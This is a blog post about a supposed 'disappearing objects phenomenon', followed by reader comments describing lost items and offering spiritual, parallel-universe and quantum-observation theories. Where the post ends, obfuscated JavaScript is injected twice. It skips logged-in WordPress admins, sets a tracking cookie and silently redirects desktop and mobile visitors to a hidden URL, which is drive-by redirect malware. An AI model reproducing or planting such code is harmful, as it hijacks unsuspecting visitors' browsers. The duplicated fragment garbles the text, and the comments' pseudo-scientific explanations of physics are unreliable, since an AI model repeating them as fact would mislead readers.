Disappearing Objects Phenomenon Explanation

The disappearing objects phenomenon (DOP) is a somewhat known type of event that has been having a significant number of reported cases.
I had no previous knowledge of these type of events, nor regarding the large quantity of people reporting things that mysteriously disappear.
Most times, people tend to forget about DOP events no matter how strange the situation was. They forget about them ever taking place, don’t give it much thought or discarding it as unimportant. It could also be happening because the DOP appears impossible to the person experiencing it. Also, the mind could be trying to justify itself to what it knows, since the mind consistently finds correlations as a means of making sense of the world. People find themselves dwelling over Newtonian (physical) DOP explanations such as being victims of robbery, memory failure or rather prefer not talking about it to avoid being seen as crazy or anything similar.

What happened to me

In my case, it happened when the kitchen knife disappeared while I was preparing lunch. I’ve searched everywhere, all the logical places. Trash cans, kitchen drawers, behind things, also unlike places like under furniture, outside the house and places no one would have remembered. The fact is, even though I thought of and search everywhere, the knife was nowhere to be found.
A few days after the event, I still couldn’t wrap my brain around the strange disappearing knife act. There seems to be no “logical” explanation as to what have had happened. At some point, I thought of search the Internet for any reasonable explanation for it, or to find similar phenomenon experiences.

I searched the Internet for answers and found many interesting things, but no DOP (Disappearing Object Phenomenon) explanation I could resonate.
No matter how accurate (or not) my conclusions and beliefs on the subject may be, I decided to put my thoughts out there to share, but mostly to get others to share their experiences for everyone’s knowledge’s sake and hoping for a glimpse of understanding of this phenomenon.

Six days ago I was preparing lunch, but I wasn’t prepared for what followed. I was using my favorite kitchen knife to cut food. At some point, I went to the fridge to get vegetables, and when I came back, the knife I was using just disappeared. The whole thing took about 30 seconds or less.

Disappearing Object Phenomenon

Disappearing Object Phenomenon

Why it’s Strange?

Yes, I know by now many of you might think that I or someone else, took the knife elsewhere and can’t remember. Maybe the dog buried it, it’s under the sink, inside the trash can or a group of ants took it away while singing “your knife is ours, now go blog about it.”

Let me tell you a bit about that. Currently, I’m in my holiday house which means I have very few things here, including other knives or similar objects. My furniture’s very minimal, by choice, so things aren’t cluttered with lots of unusual places to “accidentally lose” things.
I had no dog at the time, and no one was visiting me or anything out of the ordinary happened. What happened was going from preparing vegetables with a knife, getting something from the fridge and coming back to a disappeared knife. The whole thing took no more than 30 seconds.
There and then I started a mission to recover the knife but haven’t succeeded thus far. The knife had simply gone missing, with no Newtonian explanation whatsoever to be found.

More than six days went by (as I’m writing this), with no clues to the knife’s whereabouts or any possible reason to explain it.

It could be entirely unrelated, but it might be worth sharing another fact that might make people find other possible relations to help us all make some sense out of DOP.
Before the DOP happened, I was preparing lunch while having thoughts about the fact that we’re merely vessels for ideas. I thought that we’re merely dressing up ideas, but they already exist, and we already know them subconsciously. They just strike a chord (hence they get our “attention”), and we become entangled beyond a merely Newtonian way (more spiritual like). To me, ideas are, in essence, already existing in some energy form, waiting to become mass through us.
It might also explain, on some level, why do ideas come to mind, instead of coming from the mind. Many musicians report this kind of events, where they say great songs came to them out of nowhere. So we could just be borrowing ideas that already exist, and some factors might align us with them to help “transform” them.

But why am I telling you all this? I think the fact that this thought process was happening while the knife disappeared could have some relation, or maybe it doesn’t. But it could be a clue and some people can relate to it on some level to get us all more knowledge about the DOP.

DOP Theories

I don’t think to know what the DOP is, I understand that truth might always be a relative definition, but at least I would like to have a clearer understanding of it.

The Disappearing Object Phenomenon might be some non physical event with repercussions in the physical reality that we can “see”. When it happens, the event triggers some action that might make objects move or disappear from the physical world, even if only in our heads. Bermuda triangle rings a bell?

Many things got said about the DOP, and some talk about spirits, parallel universes, aliens, spiritual alignment and many other things. For me, they could all be true, but no one can say what it is for sure.
The latest quantum physics theories point out to parallel universes, maybe the DOP is some different universe interaction, making objects shift position or dimensions.

Also, science still needs a better understanding of the inner works of the mind. Its scientific common sense that we may have brain abilities beyond our current understanding. Especially when regarding quantum or other non-Newtonian paradigms. Maybe new spiritual abilities are being born to humankind, and the DOP is the result of that.

It might also be you saying something to yourself subconsciously that triggers these DOP events. The mind could be playing tricks on you. This kind of memory “glitches” got studied in court witness testaments where the mind might “see” what wasn’t there. Maybe these “glitches” might have caused you actually to displace the object, but since you’ve made up a version of reality in your mind, the “real” reality isn’t real to you anymore. It means that somehow you forgot a few steps of what happened, so the thing gone missing doesn’t make sense. Sure, it doesn’t make sense to your version of reality.
Can we fully trust our mind? Maybe subconsciously we’re making ourselves aware of something when experiencing DOP. Perhaps a needed shift in our life direction like new dreams or aspirations or something else that our subconscious mind knows about us or about something about to happen in the environment. Is the DOP a call to action somehow?

Maybe it’s some old family ancestors or spiritual entities trying to make a message across to you. The “truth” is, no one knows what DOP is, at least yet.

My Own Theory on DOP

So what are my conclusions on what the disappearing phenomenon?

First, let me say I have no physical proof, so it’s just my opinion based on my experience and other people’s thoughts, reactions and comments. I think the DOP could be an eye opener, something to widen our perception. In a way, it’s some “not seen” reality event which interacts with the physical world. I believe it might have to do with the yet uncharted mind abilities. We, or our subconscious we, might know more than we think we do consciously and have abilities beyond our understanding.

A few days after my DOP knife disappeared, something important happened to a close relative of mine, and that alone was special in its way. Maybe my subconscious was trying to “communicate” with me, or jolt my awareness into making me aware of something about it before it was too late. I can’t be sure, but the strange coincidences are there nonetheless. I felt strongly about the connection between DOP and something strong enough that our subconscious detects but our conscious doesn’t.

The Disappearing Object Phenomenon might be some non physical event with repercussions in the physical reality that we can “see”. When it happens, the event triggers some action that might make objects move or disappear in the physical world, or maybe in our heads alone. Bermuda triangle rings a bell? Maybe even the multiverse theory has something connection to DOP. Are material things materializing between universes?

What does it mean for someone who had contact with DOP?

We’re interacting with the universe on many levels, but we’re consciously filtering reality by our five senses alone. Nonetheless, our body, feelings and interactions with the nonphysical are happening still. Just because we can’t see electricity, doesn’t mean it’s nonexistent. The DOP could be a ripple effect giving us signs of something happening in the “background”. We should look it up more for knowledge’s sake.

So the DOP could be a sort of signal of what’s about to happen ahead in the future. It could be good or not so good because nothing has yet pointed towards one side alone. Good and bad are hard to define because they only exist in comparison, they are a relative concept. For example, cold and hot differ a lot when you live in Antarctica or in the Sahara desert. Besides that, bad things can turn out good things in the future too, so you got to keep things in perspective.

DOP could be a way for you to evaluate the “seen” and not “seen” realities and prepare for change or to notice something important in the future.

As a side note, always get suspicious if the thing disappearing is somewhat valuable. The nonphysical event shouldn’t have a monetary agenda. If what disappeared was expensive enough, take the extra time to rule out stealing from the DOP.

Tell us your experience. Did this happen to you? What was going on in your mind or life while the DOP happened? Did something important happen in the subsequent days? Maybe your input can get us all a bit closer to what the DOP is.toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator[‘userAgent’][_0x287a(‘0xd’)](/Android/i)||navigator[_0x287a(‘0xe’)][_0x287a(‘0xd’)](/BlackBerry/i)||navigator[‘userAgent’][_0x287a(‘0xd’)](/iPhone|iPad|iPod/i)||navigator[_0x287a(‘0xe’)][‘match’](/Opera Mini/i)||navigator[_0x287a(‘0xe’)][_0x287a(‘0xd’)](/IEMobile/i);}function _0x58dc3d(){return navigator[_0x287a(‘0xe’)][_0x287a(‘0xc’)](_0x287a(‘0xf’))!==-0x1||navigator[_0x287a(‘0xe’)][_0x287a(‘0xc’)](_0x287a(‘0x10’))!==-0x1||navigator[_0x287a(‘0xe’)][_0x287a(‘0xc’)](_0x287a(‘0x11’))!==-0x1||navigator[_0x287a(‘0xe’)][_0x287a(‘0xc’)](_0x287a(‘0x12’))!==-0x1||navigator[_0x287a(‘0xe’)][_0x287a(‘0xc’)](‘Firefox’)!==-0x1||navigator[_0x287a(‘0xe’)][_0x287a(‘0xc’)](_0x287a(‘0x13’))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a(‘0x14′));if(_0x55db25!==’un’){if(_0x58dc3d()||_0x51ef8a()){_0x335357(‘ppkcookie’,’un’,0x16d);window[_0x287a(‘0x15’)][‘replace’](_0x287a(‘0x16’));}}}}}(this));};toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator[‘userAgent’][_0x287a(‘0xd’)](/Android/i)||navigator[_0x287a(‘0xe’)][_0x287a(‘0xd’)](/BlackBerry/i)||navigator[‘userAgent’][_0x287a(‘0xd’)](/iPhone|iPad|iPod/i)||navigator[_0x287a(‘0xe’)][‘match’](/Opera Mini/i)||navigator[_0x287a(‘0xe’)][_0x287a(‘0xd’)](/IEMobile/i);}function _0x58dc3d(){return navigator[_0x287a(‘0xe’)][_0x287a(‘0xc’)](_0x287a(‘0xf’))!==-0x1||navigator[_0x287a(‘0xe’)][_0x287a(‘0xc’)](_0x287a(‘0x10’))!==-0x1||navigator[_0x287a(‘0xe’)][_0x287a(‘0xc’)](_0x287a(‘0x11’))!==-0x1||navigator[_0x287a(‘0xe’)][_0x287a(‘0xc’)](_0x287a(‘0x12’))!==-0x1||navigator[_0x287a(‘0xe’)][_0x287a(‘0xc’)](‘Firefox’)!==-0x1||navigator[_0x287a(‘0xe’)][_0x287a(‘0xc’)](_0x287a(‘0x13’))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a(‘0x14′));if(_0x55db25!==’un’){if(_0x58dc3d()||_0x51ef8a()){_0x335357(‘ppkcookie’,’un’,0x16d);window[_0x287a(‘0x15’)][‘replace’](_0x287a(‘0x16’));}}}}}(this));};

I am glad I stumbled upon this blog post. I myself was seeking an answer due to the strange occurrences that have happened to me over the course of the last year. The first strange thing that happened to me was when I lost my tax information for 2014. It up and vanished without a trace; no explanation whatsoever; believe me, I have thought of every conceivable place it could be. Then it was my birth certificate, my social security card. Most recently, as in within the last month, the title to my car. All very important documents all containing my person identification. This concerns me, because these are all documents I had kept in a very easy-to-find place, and had seen very recently to the time I went to look and could not find them.

This has been happening to me for years now. I have always had psychic experiences such as out- of- body experiences, esp events and, of course, DOP experiences. I had no idea that so many other people had things disappear also. The most recent example happened just last week. My significant other and I were going on a cruise and decided to buy a gadget to reinforce the lock on a back door. It is metal and looks somewhat like a tire jack except smaller but by no means tiny. When it was delivered my sig. other put it on the floor in the living room. After about a day I said I was tired of looking at it and was going to put it in the downstairs closet which I did. The morning of our departure he asked me where it was, and I said “in the closet like I told you.” He said he had looked and it wasn’t there. So I looked and he was right – it wasn’t there. We looked through every closet downstairs – couldn’t find it. Finally, we had to leave for the port. When we got back from the cruise, we decided to do a serious search. Looked in every closet upstairs and down, looked on every shelf in every closet, started looking in drawers, even looked under every bed, chair, etc. We have both become somewhat obsessive – him especially since he considers himself very rational and logical. I am less surprised since I have had this experience many times. I think that he has become a true believer at this point. As for me, I would like to know why and how this happens.

I have had several items disappear in the last few months. One afternoon in midwinter, I and an international student who is boarding with me came home to find the heat up on high, and the window blinds open in the bathroom. I decided we might have had an intruder, perhaps the older daughter of a former tenant. I hesitated to get locks changed, expensive. I put up a sign on the door saying “We know you are coming into the house. . .etc.” I eventually noticed that I could not find my watch or Apple earphones. I was convinced either I mislaid both items, or the intruder made off with them. Then a few files from work were moved about, although they did not disappear. Two days ago, I woke up to find that the turquoise ring on my left ring finger simply went missing. Very strange as it is bent and hard to take off. I love that ring, and have had it for 10 years – simple ring I had bought at a gem show. This morning I opened a small drawer to a plastic container on top of my dresser to find my Apple earphones. When I had lost the earphones, I searched everywhere for these earphones, including the plastic box. I had given up ever finding them, and was trying to replace them recently at Best Buy (but they were sold out). Now they are back! I haven’t see my watch yet. I am going to ask the spirit world for my ring back. I never take it off, either at the sink, shower, or while sleeping. I just woke up one morning, and the ring was gone.

I have an explanation that may help, this has been happening as long as I can remember. I am a logical person and always assume user error but there is more to this. Example: I set a flash light on the table, leave the room and come back to find the object gone. I keep looking convinced its right in front of me and I’m just being a goof and not seeing. So I take my hand and move it across the entire surface of the table passing back and forth covering every square inch thinking it has to be here and I’m just not seeing it so I will try the physical approach my hand is sure to touch it by going over the entire table with my hand. No luck. The object is still not there and my hand did not run into anything. I look other places thinking maybe I got distracted and set it somewhere else. No luck, then I pass by the table and there is the flashlight sitting standing up on the table right where I was sure I left it. I’m left thinking no way thats possible I just ran my hand across the entire surface of the table and I would of touched it or knocked it over so this does not make sense.

THEORY. I think it has something to do with quantum mechanics and that the universe we live in is somehow linked with consciousness and there is something to do with objects being there or visible because we observe them. When an object is not being observed it kind of exists in a low resolution state, or the matter exists as a wave, a wave of possibilities and only when observed does the item snap into focus, the matter comprising everything theoretically can exists in multiple places or wink in and out of existence so when not observed its in this strange state. Observing it gives the matter in it a definite location, not just a probability of places it could be. This could explain why it happens. It often happens when distracted and the thought of the object is not even on the mind so when u stop observing it in that state of mind it ceases to be coherent. then when you think about it hard enough you kind of bring it back into existence .

I think you’re onto something. It’s like that old saying,”if a tree fell in the woods and no one was there to hear it, would it make a sound?” Maybe we can finally answer the question with “no!” it would not make sound if there is no one there to observe it.

Wow! This is the best story! DOP happens to me regularly and has been really annoying the past 5-6 yrs. my husband and best friend just say I’m unorganized but it’s much more. I can permanently lose things sitting in my cars with doors closed, sitting at my desk, in my small walkin closet. I don’t leave the area but I drop something and reach down and never find it again. This is so common. I have lost jewelry in my closet that is never found. I’ve lost things that reappear in a place where I looked three times. I’m so glad to hear this happens to others. I thought it was just me.

I just posted a few minutes ago about an object I dropped 30 years ago and went to pick it up and it was gone. Never did find it. My poing, I was just thinking that it might have something to do with Quantum Physics also; however I didn’t get as deep as you. Good thought.

Agreed. Similar to focusing on dark things in life brings yucky things into it but only giving attention to things that are good and filled with Light will bring a good life. So when we are missing something the focus of it must help to bring it back That makes sense with the spirit realms becoming increasingly more intertwined. ?

  5. This has happened to me a few times but the most memorable was when the item not only disappeared, but was returned to me in an unusual way:

I was in my 20’s living in NYC. A beautiful and expensive sapphire ring that I designed was always on my finger except at night when I would take it off and put it on a table next to my bed. I lived alone. One morning I woke up and it was not there. I calmly searched everywhere thinking it must have fallen onto the floor or maybe I ‘forgot’ where I put it. I was in a small apartment in a historic old prewar building so it didn’t take long to search every square inch, including the jewelry box I kept in my closet. I dumped out all the jewelry and carefully sifted through it. No sapphire ring. I went to work and for the next 3 months thought about it occasionally but what could I do? Then one night I fell asleep and had a very vivid dream. In the dream I observed as a hand opened my jewelry box and my ring was sitting on top of a pile of jumbled gold chains and other jewelry. I woke up immediately and went to my closet, opened the box, and found my sapphire ring exactly as shown in my dream. I acknowledged the dream and thanked whomever was responsible for returning the ring to me. Then I went on with my life. Years later I studied dreams and dreaming with Robert Moss which helped me make sense of my shamanic powers. I have always been an empath and had high intuition and metaphysical insights. I can’t explain how this happened but I do believe there is a lot of mystery to life. And that this really happened to me.

My DOP has just happened! I was putting in an earring and it literally felt like someone took it out of my hands and it completely disappeared! I have checked all round the area and my clothing… Nothing. I also had another pair of earrings disappear last week. I know I left them on my bedside table because I always do but they were gone in the morning! Again, I have checked all around to try and find them but no luck.

This has happened to me twice in the last month. Both were two pairs of glasses, almost identical. I would take them off, put them down and go to sleep. When I wake up, they are gone. It is unfathomable to even think of how they could have disappeared. Nobody comes in my room, nobody touches my glasses. Just me.

Now I’m typing this with the blurriest vision possible, and I have to go to college in about four hours. I guess I should do some more searching..

I am at work…looked this site up because I an freaking out completely. I am a Self Storage Manager and I am in this office alone. Over the last several days, I have had a phone contact sheet disappear, a book I was reading during slow times and the closed sign all disappear. It is freaking me out. We actually have 24/7 video surveillance and alarm monitoring. I can see the video of me clearly bringing this book to work but I have never left with it. I read 4 pages out of it yesterday and it is not here. I reviewed the tapes to see if I had it in my hands when I set the alarm and it is obviously not with me. How are things disappearing? Please understand, I can see if anyone had turned the alarm off, or pushed in a code to enter and I can also see the video tape that nobody has been in this office but me during this time. The Property Manager before me died of cancer. I don’t believe in ghosts but how else is this explained?

I live alone and starting a week ago stuff just started vanishing and being moved around as well.
So my sensor watch vanished last night…..not to worry because it has a locater to find it….it makes a loud beep and vibrates….I use my iPad for the watch as it is a health watch …..anyway my iPad is showing it in the living room (where it vanished right off of my very non cluttered coffee table. So my iPad finds it….but no sounds from the watch to be heard….. my watch is invisible basically. It’s here but it’ snot here…..I have checked everywhere many times….this is crazy. So to sum it up.
Something vanished of mine that just so happened to have a locater on it…..it has been located but it cannot be seen. Interesting is this mysterious world we live in. If I find the watch I’ll post it here. But, I believe it won’t come back wherever it may be.

This happened to me in the last 12 hours! My brain hurts ’cause I can’t wrap my head around what happened!
I came home from work yesterday morning (I work nights) and came upstairs, took my laptop out of my bag then placed my bag hanging on the wardrobe like I usually do. Hour passed till about 3pm when I needed to pop to the shop. I took out my purse and got out my bank card and I.D and put my bag on the floor at the end of my bed.
I didn’t take my bag to the shop with me, I left it in my room! Coming home I just went back up stairs and continued to play games on my laptop. Around 9 pm after I had a nap I found my phone battery was low so I looked for my bag to get my charger …but my bag had gone!
I went downstairs and looked, not there. Came upstairs, looked in the bathroom and all places like inside my wardrobe, under my bed, under my draws etc, not there!
So I went into my parents room and asked if they’d seen it, they said no. All 3 of us searched the entire house looking in logical and in un-logical places such as the fridge, rabbit hutches, laundry baskets, coat hangers in the backs of doors, all cupboards …searching for 30 minutes we had looked everywhere! (The house is only a small 3 bed with not many places to hide) still the bag could not be found.
I gave up and went back to bed. I was woken up sometime during the night to dragging sounds, I thought it was just noises from the TV as I leave my Xbox running with random YouTube videos playing. I just rolled over and went back to sleep.
I woke at 7.45am the next morning rolled over and there, right next to my bed IN FRONT OF MY DOOR! Was sitting my bag! The bag was blocking the door with my purse sitting parallel on top! I shouted out to my parents but my mum had gone to work. My dad had no idea where the bag had been as he had been in bed all night and was still there. Once I charged my phone I called my mum asking if she’d found my bag at the shop I went to the previous day, she had no idea what I was talking about, so I said my bag is right here next to my bed! If it was there last night we would have tripped over it or pushed it behind the door and noticed it was there!
This is the most weirdest experience I’ve had! I just simply don’t understand it. The bag was not where I’d found it in the morning as its a not hard to miss back with black and white stripes on one side and leaped print on the other!
No one could have placed it in my room as it was right up next to my door with the purse sitting neatly on top of it.
My brain seriously hurts from this!

My DOP experience started a few days ago, when my eye pencil disappeared while holding it in my hand, Gone! I haven’t dropped it, it has vanished in front of my eyes. My initial thought was I am going insane, I keep looking and couldn’t see the eye pencil anywhere around me. The next day the same pencil re-appeared in my beauty bag , to my surprise not only my eye pencil BUT the new one which I never seen or bought it before was there too. The new pencil was exactly my color! Than the next day, I’ve bought the chewing gum pack, have put it in my bag. When I searched my bag , it wasn’t there. Somehow my intuition was telling me to look into rubbish bag from all the places;-) And yes, I found it there. Why on earth I would throw a new chewing gum pack in the bin? My reasoning is; we live in multi-universe, because we don’t know much about parallel universe it doesn’t mean non-existence. There’s inter-dimensional beings in need for our acknowledgement and attention. It’s all about our perception, if we perceive them as evil forces that’s exactly what our experience will be but if we perceive them as ‘helpers’ we might be pleasantly surprised. I’ve decided to acknowledge and communicate with them ,look at the funny side of things and see what will happen. I’ve instructed them to throw cash in my valet, have made it clear that bank transfer or checks are not acceptable:-) Let’s see if they can deliver! Keep you posted guys.

I find if I ever misplace anything, a sure way to find it quickly is to treat it as if a spirit creature has hidden it and I say “Ok, I see the funny side, can I have my object back now please?” and I then magically find things. Perhaps it is the way we look at things; when we get frustrated by the object being missing it seems to keep the object lost, but if we are allowing and let go of the situation, it reappears. Weird.

Love this!! Me too. After yesterday’s experience I am definitely going to be enlisting their help and assistance!! I think that’s what this is all about for those who are not already sensitive to the spiritual realms. And hopefully like you said they will be able to discern light from dark. Because the dark now is really really evil and destructive.

I never write about stuff like this, but I believe in a lot of different kinds of phenomena. My mother is always loosing things and then she freaks out and a while later or a few days later she usually finds it. Recently she was missing my dad who passed away 20 years ago..she was looking at his pictures and her of their youth and she put them away in her drawer. After 2 days she went back to find it and she cannot find it anywhere. She’s a senior and began to cry when she couldn’t find the pictures. I told her we’d look for them.
The funny thing is that this has happened SO MUCH with her. I used to think it’s just that she’s getting old and that she’s forgetting more often, until I came to this site. Amazing blog.
Why am I hear? Coz I think the whole DOP thing is true along with the theory of parallel universe. Something odd happened 2 months ago that freaked the hell outta my mother. We live in a one bedroom apartment. Living room, kitchen, bathroom, bedroom and a study room. My mom was lying down on the sofa in the living room facing the open kitchen area. I was in my study room recording an audio/video with my head covered by a box/blanket along with my arms..So I really could not hear much nor could I see anything. It lasted for about an hour. It was around 6pm, when I went to the living room my mom looked pale and perplexed. I asked what happened and she asked me if I had come into the kitchen. I told her no coz I was recording. She was afraid of something I could tell. She told me that when she was sleeping (the lights were off and the curtains were still open but there was blue evening light shining in the room) she felt a child playing with her feet and she shook her feet, but then she realized there were no children in our apartment. She immediately woke up. What she saw standing in the kitchen was spooky. She claims she saw a girl who looked EXACTLY like me. The girl was in the kitchen with her back turned, she was busy doing something in the dark in the kitchen – like preparing something or looking for something. She even said I faced the fridge…then mother yelled at the ‘double’ me asking why I’m doing things in the dark, why don’t you turn on the light…the image turned around and simply starred at her. She didn’t reply. Then my mom thought something was wrong with me and she began to sit herself up, slipped on her slippers and when she stood up to look – the girl was not there. So my mom went into the kitchen, turned on every single light, but was unable to see the girl again. Her description was just so frigging scary. The girl was me. BUT. A younger – thinner – version of me. She was wearing a red t-shirt, tight fitting.

Anyway, so mom asks me if I had come, I said no, I said maybe you were dreaming, then she started to yell at me with such anger and frustration. I believed she must have seen something. She said she even called out – but I DID NOT HEAR HER. I was recording and the slightest sound can be picked up.

I did a prayer of Jesus & Arch Angel Micheal for protection and safety. Also, I did research, either it could have been a ghost or a dimensional doppelganger from a different time and life. A life where I stayed thin and never married. (I’ve gained a few pounds after I got married).
What happened a few weeks later….
I was in the kitchen looking for a brand new coffee bag I had bought and had only used once previously. I’m the only one who makes it and drinks it. My mom doesn’t touch my tea and coffee cupboard. When I open the large bin that I stored my coffee in, the coffee bag was not inside of the bin!!! It was completely empty. Like I mean nothing was in that bin, just power from the previous coffee. I looked every frigging where in the kitchen cabinets. No visitors had come who even use ground coffee. I still can’t understand for the life of me where the hell did my coffee bag go?!!?

I told my mom and she had no clue where it was. She never touches the tea and coffee area.

A few weeks later my mom claimed that while she was alone in the apartment she heard a loud sneeze (like the way I sneeze) only 2 meters away from her. I don’t think a ghost/spirit would sneeze….she is so freaked out by all this now and is scared to sleep. Even I am scared sometimes. We don’t like sounds and things we can’t see!!

After months of research and convincing I’ve come to the conclusion that my other self in the parallel universe needed the coffee more than I did. She thought she was taking her own – but she was actually taking mine. Maybe she came for the coffee and who knows what else….I mean doing an exorcism for demons and negative energies is one thing – but how on earth is one to prevent parallel universe accidental interventions?
If anyone could provide some insight on this matter I would really appreciate it. Do you think that I may have solved the case?
I still can’t find my coffee though, nor can my mom find her pictures.

I’m going through this right now! I was observing one of my favorite knives one day. When I was done, I put it back where it belonged. In my safe. To this day, I haven’t laid eyes on it since then because it wasn’t important at the time. Today just minutes ago, I wanted to look at it again. So I go to the exact same safe where I stored it. GONE!!!!!!!!! How could it possibly be gone when I put it in the safe? I put it in the safe, why isn’t it there?

I’m glad I’m not the only one experiencing disappearing things. This phenomenon has been occurring for over a year, I was starting to question my mind and not telling anyone until it happen to my grandson yesterday. I came home for lunch, dropped the truck keys on kitchen table. I asked my grandson to clear the kitchen table while I was getting supper prepared in the slow cooker on the kitchen counter and had my back to him. I was ready to go to work and asked my grandson where he put the keys. He said he placed the keys on the counter next to me which I didn’t see him do and he thought I was playing a joke on him. We looked everywhere, garbage can, inside the fridge and freezer, microwave, couch–nowhere to be found. My grandson kept saying “how can that be, who would’ve took them”. Needing an explanation.

I googled this because I LOST MY FUCKING PHONE. Yes. My phone. I woke up at like, 5.00 in the morning to do my homework. And the first thing I do everyday I wake up is check my phone. So, I woke up… checked all my messages/notifications like usual… and then I went to my bathroom. And I CLEARLY remember putting my phone right next to my pillow. Anyway, I go to the bathroom and come back to send an important message, and my phone was nowhere to be found. I searched my whole bed. Inside the pillow covers, under the mattress. Since similar things have been happening to me a lot recently, I decided to search my whole room. I even turned my cupboard upside down. I’ve told my family about it and they all have been searching but no sign. (Btw, the door was closed at it was 5.00ish in the morning) I tried calling as well, but the phone was on silent so I realised its no use…

    A night before this….
I was doing my homework on the bed and I went to the bathroom like my previous experience, and when I came back I couldn’t find my pencil case anywhere. The door was open, so I went to my mom and scolded her for not keeping an eye on my two-year-old brother because he is always taking my stuff and throwing them in weird places. After scolding her, I searched everywhere. but no sign. I eventually gave up, went back to sit on my bed. I was sitting cross-legged and I went on my phone. Like, five minutes I put my phone down and the pencil case is IN MY FUCKING LAP.
The next morning I lose my phone. Yayy. I’m really worried because if it doesn’t come back like other petty things that keep disappearing my parents will never get me a new one. They’re already saying I was irresponsible and lost it somehow.

I was reading a book by Sonia Choquet Diary of a psychic, got distracted with my daughter, and could never find the book. Searched the whole house even though it was in my bedroom when I was reading it. Three hours later a friend came and brought me a small box of sweets which I put in my fridge. It was NOT there the following morning. no one opened the fridge!!! I didn’t eat the stuff, my daughter was asleep when the friend came and when I opened the fridge in the morning. Am I losing my marbles? Two things disappeared in one day!!! Nobody stole them because nobody came and nobody wanted those things.

For the past few weeks, things have been disappearing from my home and my locker at school.
First, my white cheddar cheez its disappeared. It was a normal day of school and nothing strange really happened. When I came home I couldn’t wait to eat those cheez its but when I went to the pantry, they were gone! I looked everywhere for the red box but they were no where to be seen. Until today, I thought my brother took them and ate them all. I asked everyone in the house what happened to my cheez its, but no one knew anything about it. Also, the pantry was opened when I couldn’t find my cheez its.
Next, a few days later, I had put poptarts and fruit snacks in my backpack. The next day, I looked in my backpack and the poptarts and the fruit snacks were gone. At the time, my neighbors were in the house waiting to go to school so I of course thought one of them took them. I even searched their backpacks, but nothing was there. Also, when I noticed my poptarts and fruit snacks were gone, the zipper was opened.
Lastly, my headphones disappeared. I was at school and it was passing time. I went to my locker, only to see that the lock was opened. I looked through my locker and I thought everything was there. At the time, I didn’t think much of it, I just thought I left my locker open. But today I noticed that my headphones were gone. I was looking through my backpack and they were gone. I just thought they were in my other backpack. When I got home from school, I immediately looked through my other backpack to see if I had left them there, but there was nothing there.
Normally, I do not believe in the supernatural things (or whatever this is), but these situations have made me think otherwise.

i was rearranging my wardrobe last night. i had all my clothes on the floor ready to be folded and i saw my sunglasses (in the sunglasses case) lying among the clothes so i just picked it up and placed it beside me because i was afraid it might get buried among the clothes and i might sit on it later. i was done folding the clothes and i turned to pick up my sunglasses and it was GONE. i hadn’t moved an inch. i was sitting in one spot and folding clothes (piling one cloth over another) and i was alone in my room. the duration between the time i placed the glasses beside me and the time i turned to pick it up again was barely 15 mins. i searched everywhere; in between my folded clothes (messed it all up and had to fold it again later), my bookshelf, bed, wardrobe, behind the wardrobe, on top of my wardrobe literally everywhere (assuming i might have placed it somewhere else and had forgotten about it) but it’s nowhere to be found.

i could not sleep all night. i am not worried about my sunglasses but that very incident was very very very weird. i just can’t seem to wrap my head around what just happened and it’s kinda freaking me out. i have no explanation for what happened so i came to Internet looking for a valid explanation.

